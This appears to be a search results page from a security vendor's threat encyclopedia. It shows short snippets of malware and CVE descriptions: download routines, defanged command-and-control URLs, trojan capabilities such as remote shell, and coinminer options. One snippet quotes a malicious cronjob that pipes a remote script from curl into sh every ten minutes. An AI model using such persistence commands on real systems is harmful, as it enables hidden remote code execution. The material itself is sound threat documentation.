Search
Keyword: URL
usually C:\Documents and Settings\{user name} on Windows 2000, XP, and Server 2003, or C:\Users\{user name} on Windows Vista and 7.) It downloads a possibly malicious file from a certain URL. The URL where
and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a long file: URL in an argument, aka Bug Id 6854303. sun jdk 1.5.0,sun jdk 1.6.0,sun jre 1.3.1_01,sun jre
file from a certain URL. The URL where this malware downloads the said file depends on the following parameter(s) passed on to it by its components: duFJfXw Other Details This Trojan requires its main
state Lock workstation Display a message box Perform port mapping Capture screen Perform remote shell NOTES: It connects to the following URL to send and receive information: http://web.{BLOCKED
}.{BLOCKED}.53.15/bermuda/triangle.php It saves the files it downloads using the following names: %User Temp%\shereder.exe - may also contain an error code if the URL is inaccessible (Note: %User Temp%
usually C:\Windows\System32.) NOTES: This Trojan sets the system time to September 27, 2019, 09:04 AM. If there is an active Internet connection, it opens the browser to view the non-malicious URL
downloads a possibly malicious file from a certain URL. The URL where this malware downloads the said file depends on the following parameter(s) passed on to it by its components: val prime Information Theft
\Microsoft\ Internet Explorer\SearchScopes DisplayName = "Google" HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\SearchScopes URL = "http://www.google.com/cse?cx
certain URL. The URL where this malware downloads the said file depends on the following parameter(s) passed on to it by its components: data jar lhost lport NOTES: This malware combines the two downloaded
Windows Server 2012.) NOTES: It connects the following URL to download data related to GeoIP: https://www.{BLOCKED}d.com/en/locate-my-ip-address The downloaded data should contain OCEANIA. The downloaded
kdb wdb nv2 flkb sko xbrl sxc p12 tax It does the following: It connects to the following URL to report the affected system's information: http://{BLOCKED}plin.net/wordpress/wp-includes/oops.php?id
kdb wdb nv2 flkb sko xbrl sxc p12 tax It does the following: It connects to the following URL to report the affected system's information: http://{BLOCKED}plin.net/wordpress/wp-includes/oops.php?id
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Download Routine This Trojan downloads the file from the following URL and renames the file when
it creates file and directory I - renames file to directory name J - creates folder from filename K - creates file and sets Last Modified to new time L - connects to URL passed in z1 M - executes file
the following URL and renames the file when stored in the affected system: http://{BLOCKED}hirrotaract.org/487ygfh?sFpvKJ=sFpvKJ http://{BLOCKED}livingph.com/487ygfh?sFpvKJ=sFpvKJ http://{BLOCKED
from the following URL and renames the file when stored in the affected system: http://{BLOCKED}.{BLOCKED}.191.97/soft/get.php?name=8aa7dee7 It saves the files it downloads using the following names:
CVE-2009-3985 �Mozilla Firefox before 3.0.16 and 3.5.x before 3.5.6, allows remote attackers to associate spoofed content with an invalid URL by setting document.location to this URL, and then
when visiting malicious sites. Other Details This Coinminer accepts the following parameters: -a, --algo=ALGO cryptonight (default) or cryptonight-lite -o, --url=URL URL of mining server -O, --userpass
)|sh Creates the following cronjob to enable automatic execution of a shell script found in the URL every 10 minutes: Path: /etc/cron.d/root Content: */10 * * * * root (curl -fsSL -m180
at every system startup: Extracted content of WindowsSecure.zip Download Routine This Trojan downloads the file from the following URL and renames the file when stored in the affected system: https://